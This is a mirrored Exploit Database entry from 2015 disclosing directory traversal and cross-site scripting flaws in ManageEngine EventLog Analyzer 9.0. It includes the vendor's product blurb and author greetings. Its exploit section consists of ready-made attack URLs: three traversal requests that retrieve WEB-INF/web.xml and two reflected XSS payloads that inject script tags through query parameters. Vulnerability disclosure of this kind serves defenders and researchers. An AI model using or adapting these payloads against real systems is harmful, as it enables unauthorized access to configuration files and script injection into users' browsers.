ManageEngine EventLog Analyzer 9.0 – Directory Traversal / Cross-Site Scripting

• Exploit Database
• 57 阅读

• 作者： Ertebat Gostar Co
  日期： 2015-01-26
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/35910/

•  ################################################################################################
   ##
   #...:::::ManageEngine EventLog Analyzer Directory Traversal/XSSVulnerabilities::::.... # 
   # #############################################################################################
  
  
  Sobhan System Network & Security Group (sobhansys)
  								
  -------------------------------------------------------
  # Date: 2015-01-24
  # Exploit Author: AmirHadi Yazdani (Sobhansys Co)
  # Vendor Homepage: http://www.manageengine.com/products/eventlog/
  # Demo Link: http://demo.eventloganalyzer.com/event/index3.do
  #Affected version: <= Build Version: 9.0
  
  About ManageEngine EventLog Analyzer (From Vendor Site) :									
  EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market.
  Using this Log Analyzer software, organizations can automate 
  the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting,
  and archiving from one central location. 
  This event log analyzer software helps to monitor file integrity, conduct log forensics analysis,
  monitor privileged users and comply to different compliance regulatory bodies
  by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
  --------------------------------------------------------
  
  									
  I'M hadihadi From Virangar Security Team
  
  special tnx to:MR.nosrati,black.shadowes,MR.hesy
  & all virangar members & all hackerz
  
  greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
  
  spl:Z.Khodaee
  
  -------
  exploit:
  
  Diretory Traversal :
  
  http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
  http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
  http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f
  
  XSS :
  
  http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
  http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate
  
  
  ----
  Sobhan system Co.
  Signal Network And Security Group (www.signal-net.net)
  
  E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net